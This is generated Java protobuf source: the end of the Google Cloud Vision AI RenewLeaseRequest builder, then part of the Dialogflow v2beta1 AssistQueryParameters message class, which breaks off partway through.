to_bitField0_ = 0; if (((from_bitField0_ & 0x00000008) != 0)) { result.term_ = termBuilder_ == null ? term_ : termBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.visionai.v1.RenewLeaseRequest) { return mergeFrom((com.google.cloud.visionai.v1.RenewLeaseRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.visionai.v1.RenewLeaseRequest other) { if (other == com.google.cloud.visionai.v1.RenewLeaseRequest.getDefaultInstance()) return this; if (!other.getId().isEmpty()) { id_ = other.id_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getSeries().isEmpty()) { series_ = other.series_; bitField0_ |= 0x00000002; onChanged(); } if (!other.getOwner().isEmpty()) { owner_ = other.owner_; bitField0_ |= 0x00000004; onChanged(); } if (other.hasTerm()) { mergeTerm(other.getTerm()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { id_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { series_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 26: { owner_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000004; break; } // case 26 case 34: { input.readMessage(getTermFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000008; break; } // case 34 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object id_ = ""; /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return The id. */ public java.lang.String getId() { java.lang.Object ref = id_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); id_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return The bytes for id. */ public com.google.protobuf.ByteString getIdBytes() { java.lang.Object ref = id_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); id_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @param value The id to set. * @return This builder for chaining. */ public Builder setId(java.lang.String value) { if (value == null) { throw new NullPointerException(); } id_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @return This builder for chaining. */ public Builder clearId() { id_ = getDefaultInstance().getId(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Lease id. * </pre> * * <code>string id = 1;</code> * * @param value The bytes for id to set. * @return This builder for chaining. */ public Builder setIdBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); id_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object series_ = ""; /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return The series. */ public java.lang.String getSeries() { java.lang.Object ref = series_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); series_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return The bytes for series. */ public com.google.protobuf.ByteString getSeriesBytes() { java.lang.Object ref = series_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); series_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @param value The series to set. * @return This builder for chaining. */ public Builder setSeries(java.lang.String value) { if (value == null) { throw new NullPointerException(); } series_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @return This builder for chaining. */ public Builder clearSeries() { series_ = getDefaultInstance().getSeries(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Series name. * </pre> * * <code>string series = 2;</code> * * @param value The bytes for series to set. * @return This builder for chaining. */ public Builder setSeriesBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); series_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private java.lang.Object owner_ = ""; /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return The owner. */ public java.lang.String getOwner() { java.lang.Object ref = owner_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); owner_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return The bytes for owner. */ public com.google.protobuf.ByteString getOwnerBytes() { java.lang.Object ref = owner_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); owner_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @param value The owner to set. * @return This builder for chaining. */ public Builder setOwner(java.lang.String value) { if (value == null) { throw new NullPointerException(); } owner_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @return This builder for chaining. */ public Builder clearOwner() { owner_ = getDefaultInstance().getOwner(); bitField0_ = (bitField0_ & ~0x00000004); onChanged(); return this; } /** * * * <pre> * Lease owner. * </pre> * * <code>string owner = 3;</code> * * @param value The bytes for owner to set. * @return This builder for chaining. */ public Builder setOwnerBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); owner_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } private com.google.protobuf.Duration term_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder> termBuilder_; /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> * * @return Whether the term field is set. */ public boolean hasTerm() { return ((bitField0_ & 0x00000008) != 0); } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> * * @return The term. */ public com.google.protobuf.Duration getTerm() { if (termBuilder_ == null) { return term_ == null ? com.google.protobuf.Duration.getDefaultInstance() : term_; } else { return termBuilder_.getMessage(); } } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public Builder setTerm(com.google.protobuf.Duration value) { if (termBuilder_ == null) { if (value == null) { throw new NullPointerException(); } term_ = value; } else { termBuilder_.setMessage(value); } bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public Builder setTerm(com.google.protobuf.Duration.Builder builderForValue) { if (termBuilder_ == null) { term_ = builderForValue.build(); } else { termBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000008; onChanged(); return this; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public Builder mergeTerm(com.google.protobuf.Duration value) { if (termBuilder_ == null) { if (((bitField0_ & 0x00000008) != 0) && term_ != null && term_ != com.google.protobuf.Duration.getDefaultInstance()) { getTermBuilder().mergeFrom(value); } else { term_ = value; } } else { termBuilder_.mergeFrom(value); } if (term_ != null) { bitField0_ |= 0x00000008; onChanged(); } return this; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public Builder clearTerm() { bitField0_ = (bitField0_ & ~0x00000008); term_ = null; if (termBuilder_ != null) { termBuilder_.dispose(); termBuilder_ = null; } onChanged(); return this; } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public com.google.protobuf.Duration.Builder getTermBuilder() { bitField0_ |= 0x00000008; onChanged(); return getTermFieldBuilder().getBuilder(); } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ public com.google.protobuf.DurationOrBuilder getTermOrBuilder() { if (termBuilder_ != null) { return termBuilder_.getMessageOrBuilder(); } else { return term_ == null ? com.google.protobuf.Duration.getDefaultInstance() : term_; } } /** * * * <pre> * Lease term. * </pre> * * <code>.google.protobuf.Duration term = 4;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder> getTermFieldBuilder() { if (termBuilder_ == null) { termBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.Duration, com.google.protobuf.Duration.Builder, com.google.protobuf.DurationOrBuilder>( getTerm(), getParentForChildren(), isClean()); term_ = null; } return termBuilder_; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.visionai.v1.RenewLeaseRequest) } // @@protoc_insertion_point(class_scope:google.cloud.visionai.v1.RenewLeaseRequest) private static final com.google.cloud.visionai.v1.RenewLeaseRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.visionai.v1.RenewLeaseRequest(); } public static com.google.cloud.visionai.v1.RenewLeaseRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<RenewLeaseRequest> PARSER = new com.google.protobuf.AbstractParser<RenewLeaseRequest>() { @java.lang.Override public RenewLeaseRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<RenewLeaseRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<RenewLeaseRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.visionai.v1.RenewLeaseRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleapis/google-cloud-java
35,788
java-dialogflow/proto-google-cloud-dialogflow-v2beta1/src/main/java/com/google/cloud/dialogflow/v2beta1/AssistQueryParameters.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/dialogflow/v2beta1/participant.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.dialogflow.v2beta1; /** * * * <pre> * Represents the parameters of human assist query. * </pre> * * Protobuf type {@code google.cloud.dialogflow.v2beta1.AssistQueryParameters} */ public final class AssistQueryParameters extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.dialogflow.v2beta1.AssistQueryParameters) AssistQueryParametersOrBuilder { private static final long serialVersionUID = 0L; // Use AssistQueryParameters.newBuilder() to construct. private AssistQueryParameters(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private AssistQueryParameters() {} @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new AssistQueryParameters(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_descriptor; } @SuppressWarnings({"rawtypes"}) @java.lang.Override protected com.google.protobuf.MapFieldReflectionAccessor internalGetMapFieldReflection( int number) { switch (number) { case 1: return internalGetDocumentsMetadataFilters(); default: throw new RuntimeException("Invalid map field number: " + number); } } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.class, com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.Builder.class); } public static final int DOCUMENTS_METADATA_FILTERS_FIELD_NUMBER = 1; private static final class DocumentsMetadataFiltersDefaultEntryHolder { static final com.google.protobuf.MapEntry<java.lang.String, java.lang.String> defaultEntry = com.google.protobuf.MapEntry.<java.lang.String, java.lang.String>newDefaultInstance( com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_DocumentsMetadataFiltersEntry_descriptor, com.google.protobuf.WireFormat.FieldType.STRING, "", com.google.protobuf.WireFormat.FieldType.STRING, ""); } @SuppressWarnings("serial") private com.google.protobuf.MapField<java.lang.String, java.lang.String> documentsMetadataFilters_; private com.google.protobuf.MapField<java.lang.String, java.lang.String> internalGetDocumentsMetadataFilters() { if (documentsMetadataFilters_ == null) { return com.google.protobuf.MapField.emptyMapField( DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry); } return documentsMetadataFilters_; } public int getDocumentsMetadataFiltersCount() { return internalGetDocumentsMetadataFilters().getMap().size(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public boolean containsDocumentsMetadataFilters(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } return internalGetDocumentsMetadataFilters().getMap().containsKey(key); } /** Use {@link #getDocumentsMetadataFiltersMap()} instead. */ @java.lang.Override @java.lang.Deprecated public java.util.Map<java.lang.String, java.lang.String> getDocumentsMetadataFilters() { return getDocumentsMetadataFiltersMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public java.util.Map<java.lang.String, java.lang.String> getDocumentsMetadataFiltersMap() { return internalGetDocumentsMetadataFilters().getMap(); } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public /* nullable */ java.lang.String getDocumentsMetadataFiltersOrDefault( java.lang.String key, /* nullable */ java.lang.String defaultValue) { if (key == null) { throw new NullPointerException("map key"); } java.util.Map<java.lang.String, java.lang.String> map = internalGetDocumentsMetadataFilters().getMap(); return map.containsKey(key) ? map.get(key) : defaultValue; } /** * * * <pre> * Key-value filters on the metadata of documents returned by article * suggestion. If specified, article suggestion only returns suggested * documents that match all filters in their * [Document.metadata][google.cloud.dialogflow.v2beta1.Document.metadata]. * Multiple values for a metadata key should be concatenated by comma. For * example, filters to match all documents that have 'US' or 'CA' in their * market metadata values and 'agent' in their user metadata values will be * ``` * documents_metadata_filters { * key: "market" * value: "US,CA" * } * documents_metadata_filters { * key: "user" * value: "agent" * } * ``` * </pre> * * <code>map&lt;string, string&gt; documents_metadata_filters = 1;</code> */ @java.lang.Override public java.lang.String getDocumentsMetadataFiltersOrThrow(java.lang.String key) { if (key == null) { throw new NullPointerException("map key"); } java.util.Map<java.lang.String, java.lang.String> map = internalGetDocumentsMetadataFilters().getMap(); if (!map.containsKey(key)) { throw new java.lang.IllegalArgumentException(); } return map.get(key); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( output, internalGetDocumentsMetadataFilters(), DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry, 1); getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (java.util.Map.Entry<java.lang.String, java.lang.String> entry : internalGetDocumentsMetadataFilters().getMap().entrySet()) { com.google.protobuf.MapEntry<java.lang.String, java.lang.String> documentsMetadataFilters__ = DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry .newBuilderForType() .setKey(entry.getKey()) .setValue(entry.getValue()) .build(); size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, documentsMetadataFilters__); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.dialogflow.v2beta1.AssistQueryParameters)) { return super.equals(obj); } com.google.cloud.dialogflow.v2beta1.AssistQueryParameters other = (com.google.cloud.dialogflow.v2beta1.AssistQueryParameters) obj; if (!internalGetDocumentsMetadataFilters().equals(other.internalGetDocumentsMetadataFilters())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (!internalGetDocumentsMetadataFilters().getMap().isEmpty()) { hash = (37 * hash) + DOCUMENTS_METADATA_FILTERS_FIELD_NUMBER; hash = (53 * hash) + internalGetDocumentsMetadataFilters().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseDelimitedFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.dialogflow.v2beta1.AssistQueryParameters parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.dialogflow.v2beta1.AssistQueryParameters prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Represents the parameters of human assist query. * </pre> * * Protobuf type {@code google.cloud.dialogflow.v2beta1.AssistQueryParameters} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.dialogflow.v2beta1.AssistQueryParameters) com.google.cloud.dialogflow.v2beta1.AssistQueryParametersOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_descriptor; } @SuppressWarnings({"rawtypes"}) protected com.google.protobuf.MapFieldReflectionAccessor internalGetMapFieldReflection( int number) { switch (number) { case 1: return internalGetDocumentsMetadataFilters(); default: throw new RuntimeException("Invalid map field number: " + number); } } @SuppressWarnings({"rawtypes"}) protected com.google.protobuf.MapFieldReflectionAccessor internalGetMutableMapFieldReflection( int number) { switch (number) { case 1: return internalGetMutableDocumentsMetadataFilters(); default: throw new RuntimeException("Invalid map field number: " + number); } } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.class, com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.Builder.class); } // Construct using com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; internalGetMutableDocumentsMetadataFilters().clear(); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.dialogflow.v2beta1.ParticipantProto .internal_static_google_cloud_dialogflow_v2beta1_AssistQueryParameters_descriptor; } @java.lang.Override public com.google.cloud.dialogflow.v2beta1.AssistQueryParameters getDefaultInstanceForType() { return com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.getDefaultInstance(); } @java.lang.Override public com.google.cloud.dialogflow.v2beta1.AssistQueryParameters build() { com.google.cloud.dialogflow.v2beta1.AssistQueryParameters result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.dialogflow.v2beta1.AssistQueryParameters buildPartial() { com.google.cloud.dialogflow.v2beta1.AssistQueryParameters result = new com.google.cloud.dialogflow.v2beta1.AssistQueryParameters(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0(com.google.cloud.dialogflow.v2beta1.AssistQueryParameters result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.documentsMetadataFilters_ = internalGetDocumentsMetadataFilters(); result.documentsMetadataFilters_.makeImmutable(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.dialogflow.v2beta1.AssistQueryParameters) { return mergeFrom((com.google.cloud.dialogflow.v2beta1.AssistQueryParameters) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.cloud.dialogflow.v2beta1.AssistQueryParameters other) { if (other == com.google.cloud.dialogflow.v2beta1.AssistQueryParameters.getDefaultInstance()) return this; internalGetMutableDocumentsMetadataFilters() .mergeFrom(other.internalGetDocumentsMetadataFilters()); bitField0_ |= 0x00000001; this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { com.google.protobuf.MapEntry<java.lang.String, java.lang.String> documentsMetadataFilters__ = input.readMessage( DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry .getParserForType(), extensionRegistry); internalGetMutableDocumentsMetadataFilters() .getMutableMap() .put( documentsMetadataFilters__.getKey(), documentsMetadataFilters__.getValue()); bitField0_ |= 0x00000001; break; } // case 10 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private com.google.protobuf.MapField<java.lang.String, java.lang.String> documentsMetadataFilters_; private com.google.protobuf.MapField<java.lang.String, java.lang.String> internalGetDocumentsMetadataFilters() { if (documentsMetadataFilters_ == null) { return com.google.protobuf.MapField.emptyMapField( DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry); } return documentsMetadataFilters_; } private com.google.protobuf.MapField<java.lang.String, java.lang.String> internalGetMutableDocumentsMetadataFilters() { if (documentsMetadataFilters_ == null) { documentsMetadataFilters_ = com.google.protobuf.MapField.newMapField( DocumentsMetadataFiltersDefaultEntryHolder.defaultEntry); } if (!documentsMetadataFilters_.isMutable()) { documentsMetadataFilters_ = documentsMetadataFilters_.copy(); } bitField0_ |= 0x00000001; onChanged(); return documentsMetadataFilters_; } public int getDocumentsMetadataFiltersCount() { return internalGetDocumentsMetadataFilters().getMap().size(); } /** * * * 